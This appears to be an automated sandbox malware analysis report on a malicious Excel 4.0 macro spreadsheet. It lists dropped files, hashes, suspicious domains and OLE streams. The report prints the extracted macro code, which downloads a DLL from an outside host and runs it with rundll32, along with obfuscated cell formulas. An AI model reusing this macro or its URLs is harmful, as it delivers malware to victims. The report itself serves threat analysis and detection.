                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:downloaded
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:true
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
                                                              IE Cache URL:https://rnollg.com/kev/scfrd.dll
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\FDDE0000
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):59780
                                                              Entropy (8bit):7.769791887747964
                                                              Encrypted:false
                                                              SSDEEP:768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQ4:SwmW+aB3viH/WaI5xGVpoWpgv
                                                              MD5:756B1D60127951007258D72EAF5243B3
                                                              SHA1:B6999B2C61B0D5F146A3A9C140B465759CF1A754
                                                              SHA-256:5A9CBA6603DCF58220E2076ABCC1E9889917769BAB73D24EFD54C4F17B309D1F
                                                              SHA-512:50ACC2CF2B1D7750B5F8F19B354E2EA0142F4649F685EA702C4F02C4ED7E017866D1DDC4283CC24F56CE3BF75FBC5CC4230F4406D807CFFBDF7A191B2AE9CB90
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: ..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...*E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a.*.BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:34:42 2021, atime=Wed Jan 27 04:34:42 2021, length=8192, window=hide
                                                              Category:dropped
                                                              Size (bytes):867
                                                              Entropy (8bit):4.478468218734738
                                                              Encrypted:false
                                                              SSDEEP:12:85QZn1n4CLgXg/XAlCPCHaXgzB8IB/JovX+WnicvbjbDtZ3YilMMEpxRljKfkcTg:85e4U/XTwz6IYvYebDv3qekwrNru/
                                                              MD5:B5FA6EDF15A44D7B78F7D923AE79E0B0
                                                              SHA1:DCAEEC08A30FC74C486371D75B6146FBE60BBF37
                                                              SHA-256:A019AD5EF24BEB3F34EEDB8F720A148C70979DC5DB441FE2DAAAA27C244D046C
                                                              SHA-512:B24D76FB30A60C22EFFA4333C1AB70D8A47229837966FC0D0AE989D785DD181144CE56A0C022AF0F19244200F39DD5968BB8AE9E0C2B6722B49549D5333ECD60
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: L..................F...........7G..o ..n...o ..n.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....;RV,..Desktop.d......QK.X;RV,*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (4335).LNK
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jan 27 04:34:42 2021, atime=Wed Jan 27 04:34:42 2021, length=99328, window=hide
                                                              Category:dropped
                                                              Size (bytes):4076
                                                              Entropy (8bit):4.531658040899013
                                                              Encrypted:false
                                                              SSDEEP:96:8Lk/XLIkve3Qh2Lk/XLIkve3Qh2qk/XLIkve3Qh2qk/XLIkve3Q/:8L+IkeQEL+IkeQEq+IkeQEq+IkeQ/
                                                              MD5:7D69374CC0FF7B2AF57099A2C208DC1D
                                                              SHA1:EF7FFA5E9DF8BE113452FDC7CF6A6EB820A59AAF
                                                              SHA-256:F19BA3A3D77B50B19258FCD30A1EAB60098182727A3D74227DE9AC3C8F276429
                                                              SHA-512:14EA976F449A3AB33C33260115254571AD38B8229AF364A98A67F9EA87617A43256B2F7C28492FFE95EE5E88D18751C0C1F362A524E3AEAA81155B29773AA303
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: L..................F.... ...3....{..o ..n......n................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2. d..;RR, .CASE(4~1.XLS..L.......Q.y.Q.y*...8.....................c.a.s.e. .(.4.3.3.5.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\case (4335).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.4.3.3.5.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9F.C...........[D_....3N...W...9F
                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):176
                                                              Entropy (8bit):4.505329288435076
                                                              Encrypted:false
                                                              SSDEEP:3:oyBVomMEJeIAJmMEJeIAJmMEJeIAJmMEJv:dj6FFFE
                                                              MD5:E523EBFB4AF52DD8C201A2682CB6D5C2
                                                              SHA1:9E524CE9C95F9861591F955E1958970D65C76539
                                                              SHA-256:D9A1347100542AE0ACB17709B30B3E5A3C28AF3254914EB6EBE5504A9612DD24
                                                              SHA-512:63D3E635D56D193BECB55AB8A82A984278167F0FC679A13BC63CB0273B449B0C2B62D8E3771BB8E52111D65FFAD18C2894A79598560B0CCC81C75E3491C76034
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: Desktop.LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..case (4335).LNK=0..[xls]..case (4335).LNK=0..
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\50PT1LPA.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):115
                                                              Entropy (8bit):4.399547545027885
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/ST1TrSVKcvJTSMdl1cSPcHmcgVeUgvX:XM/QNcv4qlVPCgVNg/
                                                              MD5:796C2B6962C518671977FD8F875322E4
                                                              SHA1:E7C8D7EB4238DC963C999B01B640D320E5BCEE97
                                                              SHA-256:CE08B896C90A5D1B3697D179539F689410D6226DA4697F674E21D43C16F7E629
                                                              SHA-512:5CF3C692FE6AE0A0B3224C2B5892B850F7BB22E54F993836F0585A847037643FEA883AB027FA76CF523E2F2E35AEC3AA826AF389815EE75A758FE048C56E7B97
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:govemedico.tk/
                                                              Preview: __cfduid.d5b9858d9c1e46ad471504283178ab38f1611693337.govemedico.tk/.9728.3322294912.30870453.3834856829.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NZ5UXGF8.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):119
                                                              Entropy (8bit):4.433531808225311
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/rDSQgavGqSMKNTWY97KJpKfcSNpcHmBx3TgvX:XM/rOBaIMKNKY97v0ODRTg/
                                                              MD5:E56794E70DBCEE6026450D29D29A8978
                                                              SHA1:243ED8813262E2B9FC537243CCCA576CDEB0BCF6
                                                              SHA-256:6CF74E6DB08AE634293BD9A497F5FDE9E67F3FF25E59C01C064C93157D688F73
                                                              SHA-512:5DCABD032E0C2BCE611CF40B6CF154D9056C3A1609838A1358F2FD8C13109F2D64E7990077CDCF2B1DD1558981464B71634108654EEE06A464BDA229C2ED071E
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:homesoapmolds.com/
                                                              Preview: __cfduid.d4e49f7596fb660dc86e16cec33016e4c1611693337.homesoapmolds.com/.9728.3322294912.30870453.3828460818.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\QUXL3DRG.txt
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):111
                                                              Entropy (8bit):4.419315168952571
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/GBd8tFuSI552IGT0cSN4q/md0HXvcRRgvX:XM/QdauzrSTqDH/c3g/
                                                              MD5:78C17B26331AE38E3113FF256E212001
                                                              SHA1:F2BDCBEADBCF3841B9799BF831B6168F485EFF7C
                                                              SHA-256:FE197B665D9EE490696887F2446F278C23513AAAAA2F18422CD1375BFDAFCCAD
                                                              SHA-512:6056A6B23AD6AB25FFA5342DC3CC3B23392232BC815DFC0521ECD5B07FF14B6903023F9477CAB7418918F47066222104771AE764A532D867E95B29ACA2628CEA
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:rnollg.com/
                                                              Preview: __cfduid.db774c0a7fb6365373fab39efab7d11401611693303.rnollg.com/.9728.2982294912.30870453.494472222.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y7E8FGKZ.txt
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:ASCII text
                                                              Category:downloaded
                                                              Size (bytes):117
                                                              Entropy (8bit):4.4918088703183905
                                                              Encrypted:false
                                                              SSDEEP:3:GmM/gBPrb6EHInYUZCoCAnw2lSNMXq/mbXn3TgvX:XM/8WuInYU8onweBqgXnjg/
                                                              MD5:7E09D3A0588D75401463087B2C0D8E09
                                                              SHA1:A7B75E9770705361A32DCC13AD806D5DA3A161A3
                                                              SHA-256:22F797BF239CE7F7744C554EF0C1E0B6D1C21C5522EB3FDD193E1A4E75B9819C
                                                              SHA-512:5E23D5620ED9F1DD221FD23B925A43D9F4E17B4D5DE01F19D1D0F2682B725323EED079E6BD4C54D90B5110B6627E8D8DCC66078DAB6D95FDFD4C316C7DBC695B
                                                              Malicious:false
                                                              Reputation:low
                                                              IE Cache URL:gadgetswolf.com/
                                                              Preview: __cfduid.dd17ded6f0d66b400516efab984fbccf71611693336.gadgetswolf.com/.9728.3312294912.30870453.3822376807.30864494.*.
                                                              C:\Users\user\AppData\Roaming\Ubc\way.dll
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):933888
                                                              Entropy (8bit):6.687983171155114
                                                              Encrypted:false
                                                              SSDEEP:24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
                                                              MD5:B0F3FA047F6AE39A145FD364F693638E
                                                              SHA1:1951696D8ACA4A31614BB68F9DA392402785E14E
                                                              SHA-256:0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
                                                              SHA-512:86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
                                                              Malicious:false
                                                              Joe Sandbox View:
                                                              • Filename: case (1522).xls, Detection: malicious, Browse
                                                              • Filename: case (4374).xls, Detection: malicious, Browse
                                                              • Filename: case (166).xls, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\Desktop\0FDE0000
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Applesoft BASIC program data, first line number 16
                                                              Category:dropped
                                                              Size (bytes):173366
                                                              Entropy (8bit):5.331066118802068
                                                              Encrypted:false
                                                              SSDEEP:3072:9xrtdAOtyoVlDGUUlEfblBiPP58Lml9i+aEdDhlQaEdzKp6DxrtdAOtyoVlDGUU7:9xrtdAOtyoVlDGUUlEfblBeP52ml9i+x
                                                              MD5:3FA52813F41144EBCBCB489CB2D5D8EB
                                                              SHA1:BD1996F4AAE5B541C4E792DCABB2A37D7228DB65
                                                              SHA-256:C70F62AC6330A591042A6C85EE24BC8B83376EDC4206B4C8568CB212A900FA6D
                                                              SHA-512:BFE77AC191DF8F9E0B8BBAF87F1CF4490FB22B0C86AA5E3B85907CF63AE5ED8FF86F77F09856389AA68B54FA15451004939823AD64F4D92CD1F11F334F76EE28
                                                              Malicious:false
                                                              Preview: ........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

                                                              Static File Info

                                                              General

                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
                                                              Entropy (8bit):3.8735422234438284
                                                              TrID:
                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                              File name:case (4335).xls
                                                              File size:156704
                                                              MD5:bf86559630b855e4bf2c54d641147b24
                                                              SHA1:182cbac1bdd020fa5fee6ed9d6a50d1071fbe320
                                                              SHA256:31ea3370ca06a2af45514a59a0ae49dc62ac34bc4dce44402f169a9d6fb93853
                                                              SHA512:f188cdd1ae628850d5a48f32ec17d399fdbed68ed6a6e92977374dac61a0d3286f0a2c1ff83ae4b70af219c9f3d7b49aa4ac5125f63f7f75fc6b70a17a4ddc83
                                                              SSDEEP:3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g18:49SUz4tH8vsderSh1yRNJdaAtH8U5B6F
                                                              File Content Preview:........................>.......................0...........................-......./..........................................................................................................................................................................

                                                              File Icon

                                                              Icon Hash:e4eea286a4b4bcb4

                                                              Static OLE Info

                                                              General

                                                              Document Type:OLE
                                                              Number of OLE Files:1

                                                              OLE File "case (4335).xls"

                                                              Indicators

                                                              Has Summary Info:True
                                                              Application Name:Microsoft Excel
                                                              Encrypted Document:False
                                                              Contains Word Document Stream:False
                                                              Contains Workbook/Book Stream:True
                                                              Contains PowerPoint Document Stream:False
                                                              Contains Visio Document Stream:False
                                                              Contains ObjectPool Stream:
                                                              Flash Objects Count:
                                                              Contains VBA Macros:False

                                                              Summary

                                                              Code Page:1251
                                                              Author:
                                                              Last Saved By:
                                                              Last Printed:2021-01-26 16:17:13
                                                              Create Time:2020-04-23 12:26:24
                                                              Last Saved Time:2021-01-26 16:28:15
                                                              Creating Application:Microsoft Excel
                                                              Security:0

                                                              Document Summary

                                                              Document Code Page:1251
                                                              Thumbnail Scaling Desired:False
                                                              Company:
                                                              Contains Dirty Links:False

                                                              Streams

                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                              General
                                                              Stream Path:\x5DocumentSummaryInformation
                                                              File Type:data
                                                              Stream Size:4096
                                                              Entropy:0.843601759481
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00
                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                              General
                                                              Stream Path:\x5SummaryInformation
                                                              File Type:data
                                                              Stream Size:4096
                                                              Entropy:0.362148031008
                                                              Base64 Encoded:False
                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00
                                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752
                                                              General
                                                              Stream Path:Book
                                                              File Type:Applesoft BASIC program data, first line number 8
                                                              Stream Size:145752
                                                              Entropy:3.94377585798
                                                              Base64 Encoded:True
                                                              Data ASCII:. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
                                                              Data Raw:09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                              Macro 4.0 Code

                                                              CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
                                                              CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)
                                                              
                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,